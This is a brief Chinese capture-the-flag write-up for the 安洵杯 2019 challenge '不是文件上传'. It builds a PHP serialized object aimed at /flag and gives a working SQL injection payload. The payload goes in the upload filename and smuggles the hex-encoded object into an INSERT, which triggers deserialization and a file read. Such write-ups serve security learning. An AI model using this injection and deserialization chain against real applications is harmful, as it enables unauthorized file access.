[安洵杯 2019]不是文件上传

buu给了源码链接，还是直接去看源码吧

简单看了一下，意思就是上传图片，假如helper中以序列化形式保存图片，那么在show中就可以反序列化

<?php
class helper {
    
    protected $ifview = True;
    protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
//O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}


然后因为变量属性是protected 需要在变量名前加上\x00*\x00变量名，private则是要在变量名前加上\x00类名\x00变量名
$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
$attr = unserialize($attr_temp);
所以下面用\0\0\0去填充，show反序列化前会换回去


//O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

SQL语句
INSERT INTO images (implode(",",$sql_fields)) VALUES(implode(",",$sql_val))
$sql_fields[] = "`".$key_temp."`";
$sql_val[] = "'".$value_temp."'";
title，fileame，ext，path，attr
//title这里是可控的，单引号闭合

//0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d)#.jpg